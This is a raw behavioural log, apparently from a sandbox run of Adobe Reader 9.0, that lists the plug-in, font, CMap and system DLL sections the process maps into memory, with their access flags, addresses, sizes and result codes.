Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.DEU Access: query and read Type: commit Baseaddress: 32D0000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	2054466971
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 32D0000 Size: 57344 Protection: execute Mapped to pid: own pid	success or wait	2054470226
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 32D0000 Size: 57344 Protection: readonly Mapped to pid: own pid	success or wait	2054472883
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api Access: write and read and execute Type: commit Baseaddress: 32D0000 Size: 57344 Protection: execute Mapped to pid: own pid	success or wait	2054475866
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.api Access: query and read Type: commit Baseaddress: 32D0000 Size: 57344 Protection: readonly Mapped to pid: own pid	success or wait	2054478825
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.DEU Access: write and read and execute Type: commit Baseaddress: 32D0000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	2054484284
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.DEU Access: query and read Type: commit Baseaddress: 32D0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2054487629
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 94208 Protection: execute Mapped to pid: own pid	success or wait	2054490416
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 94208 Protection: readonly Mapped to pid: own pid	success or wait	2054493314
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 94208 Protection: execute Mapped to pid: own pid	success or wait	2054496383
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\IA32.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 94208 Protection: readonly Mapped to pid: own pid	success or wait	2054498973
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Hls.deu Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 16384 Protection: execute Mapped to pid: own pid	success or wait	2054509800
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Hls.deu Access: query and read Type: commit Baseaddress: 3E90000 Size: 16384 Protection: readonly Mapped to pid: own pid	success or wait	2054513177
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 53248 Protection: execute Mapped to pid: own pid	success or wait	2054517320
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 53248 Protection: readonly Mapped to pid: own pid	success or wait	2054520808
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 53248 Protection: execute Mapped to pid: own pid	success or wait	2054524641
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\HLS.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 53248 Protection: readonly Mapped to pid: own pid	success or wait	2054528085
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\makeaccessible.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 90112 Protection: execute Mapped to pid: own pid	success or wait	2054533632
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\makeaccessible.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2054537072
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 2301952 Protection: execute Mapped to pid: own pid	success or wait	2054546115
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 4160000 Size: 2301952 Protection: readonly Mapped to pid: own pid	success or wait	2054549865
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 2301952 Protection: execute Mapped to pid: own pid	success or wait	2054561914
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api Access: query and read Type: commit Baseaddress: 4160000 Size: 2301952 Protection: readonly Mapped to pid: own pid	success or wait	2054564540
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 155648 Protection: execute Mapped to pid: own pid	success or wait	2054574238
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 155648 Protection: readonly Mapped to pid: own pid	success or wait	2054578859
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 1409024 Protection: execute Mapped to pid: own pid	success or wait	2054590678
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 1409024 Protection: readonly Mapped to pid: own pid	success or wait	2054593320
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 1409024 Protection: execute Mapped to pid: own pid	success or wait	2054601644
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 1409024 Protection: readonly Mapped to pid: own pid	success or wait	2054604313
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\pddom.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 12288 Protection: execute Mapped to pid: own pid	success or wait	2054612368
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\pddom.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2054616521
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2054620117
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 401408 Protection: readonly Mapped to pid: own pid	success or wait	2054623034
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2054627362
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 401408 Protection: readonly Mapped to pid: own pid	success or wait	2054630005
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 1060864 Protection: execute Mapped to pid: own pid	success or wait	2055355406
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 1060864 Protection: readonly Mapped to pid: own pid	success or wait	2055367410
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 6959104 Protection: execute Mapped to pid: own pid	success or wait	2055439688
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 4160000 Size: 6959104 Protection: readonly Mapped to pid: own pid	success or wait	2055442463
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 6959104 Protection: execute Mapped to pid: own pid	success or wait	2055473333
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 4160000 Size: 6959104 Protection: readonly Mapped to pid: own pid	success or wait	2055476833
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 16384 Protection: execute Mapped to pid: own pid	success or wait	2055496505
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 16384 Protection: readonly Mapped to pid: own pid	success or wait	2055500532
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2055504269
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 110592 Protection: readonly Mapped to pid: own pid	success or wait	2055506933
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	2055510106
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 110592 Protection: readonly Mapped to pid: own pid	success or wait	2055513515
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 8192 Protection: execute Mapped to pid: own pid	success or wait	2055518090
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 8192 Protection: readonly Mapped to pid: own pid	success or wait	2055521552
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 364544 Protection: execute Mapped to pid: own pid	success or wait	2055524913
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 364544 Protection: readonly Mapped to pid: own pid	success or wait	2055527522
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 364544 Protection: execute Mapped to pid: own pid	success or wait	2055531673
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 364544 Protection: readonly Mapped to pid: own pid	success or wait	2055534268
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 24576 Protection: execute Mapped to pid: own pid	success or wait	2055540326
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	2055543881
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 348160 Protection: execute Mapped to pid: own pid	success or wait	2055548647
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 348160 Protection: readonly Mapped to pid: own pid	success or wait	2055551595
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 348160 Protection: execute Mapped to pid: own pid	success or wait	2055555176
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 348160 Protection: readonly Mapped to pid: own pid	success or wait	2055557783
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 57344 Protection: execute Mapped to pid: own pid	success or wait	2055562339
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 57344 Protection: readonly Mapped to pid: own pid	success or wait	2055566067
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2055578411
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 401408 Protection: readonly Mapped to pid: own pid	success or wait	2055581042
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	2055586448
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 401408 Protection: readonly Mapped to pid: own pid	success or wait	2055589117
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 12288 Protection: execute Mapped to pid: own pid	success or wait	2055595136
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2055598886
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 90112 Protection: execute Mapped to pid: own pid	success or wait	2055602500
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2055605148
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 90112 Protection: execute Mapped to pid: own pid	success or wait	2055608224
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2055610833
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.deu Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 28672 Protection: execute Mapped to pid: own pid	success or wait	2055616340
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.deu Access: query and read Type: commit Baseaddress: 3E90000 Size: 28672 Protection: readonly Mapped to pid: own pid	success or wait	2055619826
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 122880 Protection: execute Mapped to pid: own pid	success or wait	2055625197
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 122880 Protection: readonly Mapped to pid: own pid	success or wait	2055627883
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 122880 Protection: execute Mapped to pid: own pid	success or wait	2055631103
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 122880 Protection: readonly Mapped to pid: own pid	success or wait	2055633706
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 36864 Protection: execute Mapped to pid: own pid	success or wait	2055639002
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2055642587
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 274432 Protection: execute Mapped to pid: own pid	success or wait	2055646512
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 274432 Protection: readonly Mapped to pid: own pid	success or wait	2055649141
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 274432 Protection: execute Mapped to pid: own pid	success or wait	2055652974
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 274432 Protection: readonly Mapped to pid: own pid	success or wait	2055655567
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\updater.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 12288 Protection: execute Mapped to pid: own pid	success or wait	2055662550
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\updater.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	2055666428
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 233472 Protection: execute Mapped to pid: own pid	success or wait	2055670068
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2055672675
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 233472 Protection: execute Mapped to pid: own pid	success or wait	2055676315
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2055678982
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Weblink.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 49152 Protection: execute Mapped to pid: own pid	success or wait	2055684605
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Weblink.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 49152 Protection: readonly Mapped to pid: own pid	success or wait	2055688091
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 270336 Protection: execute Mapped to pid: own pid	success or wait	2055694449
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 270336 Protection: readonly Mapped to pid: own pid	success or wait	2055697139
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 270336 Protection: execute Mapped to pid: own pid	success or wait	2055701734
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 270336 Protection: readonly Mapped to pid: own pid	success or wait	2055704384
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 6959104 Protection: execute Mapped to pid: own pid	success or wait	2056246115
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api Access: query and write and read and execute Type: image Baseaddress: 28000000 Size: 6983680 Protection: read write Mapped to pid: own pid	success or wait	2056248513
Section loaded	Path: \KnownDlls\WSOCK32.dll Access: write and read and execute Type: unknown Baseaddress: 28000000 Size: 6983680 Protection: read write Mapped to pid: own pid	object name not found	2056283452
Section loaded	Path: C:\WINDOWS\system32\wsock32.dll Access: query and write and read and execute Type: image Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid	success or wait	2056285094
Section loaded	Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid	object name not found	2056288514
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	2056290270
Section loaded	Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	object name not found	2056296061
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	2056297881
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: write and read and execute Type: commit Baseaddress: 3EC0000 Size: 1060864 Protection: execute Mapped to pid: own pid	success or wait	2056333935
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: query and read Type: commit Baseaddress: 3EC0000 Size: 1060864 Protection: readonly Mapped to pid: own pid	success or wait	2056336205
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: write and read and execute Type: commit Baseaddress: 3EC0000 Size: 1060864 Protection: execute Mapped to pid: own pid	success or wait	2056348099
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: query and read Type: commit Baseaddress: 3EC0000 Size: 1060864 Protection: readonly Mapped to pid: own pid	success or wait	2056350363
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: write and read and execute Type: commit Baseaddress: 3EC0000 Size: 1060864 Protection: execute Mapped to pid: own pid	success or wait	2056354575
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\PPKLITE.DEU Access: query and write and read and execute Type: image Baseaddress: 3EC0000 Size: 1060864 Protection: read write Mapped to pid: own pid	conflicting addresses	2056356163
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2056466377
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2056476851
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll Access: write and read and execute Type: commit Baseaddress: 4160000 Size: 679936 Protection: execute Mapped to pid: own pid	success or wait	2056558396
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll Access: query and write and read and execute Type: image Baseaddress: 4A800000 Size: 684032 Protection: read write Mapped to pid: own pid	success or wait	2056563294
Section loaded	Path: \KnownDlls\icudt36.dll Access: write and read and execute Type: unknown Baseaddress: 4A800000 Size: 684032 Protection: read write Mapped to pid: own pid	object name not found	2056588763
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\icudt36.dll Access: query and write and read and execute Type: image Baseaddress: 4AD00000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	2056592728
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2057538196
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2057541887
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2057548741
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2057552131
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2057558509
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2057562162
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2057665404
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2057693277
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2057696253
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H Access: query and read Type: commit Baseaddress: 3FE0000 Size: 8192 Protection: readonly Mapped to pid: own pid	success or wait	2057743629
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V Access: query and read Type: commit Baseaddress: 3FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2057760977
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H Access: query and read Type: commit Baseaddress: 3FE0000 Size: 8192 Protection: readonly Mapped to pid: own pid	success or wait	2058487450
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V Access: query and read Type: commit Baseaddress: 3FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2058503346
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2058564215
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2058566456
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2058603889
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2058606158
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2058642141
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2058644394
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2058680551
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2058682805
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2058718826
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2058721067
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2058805033
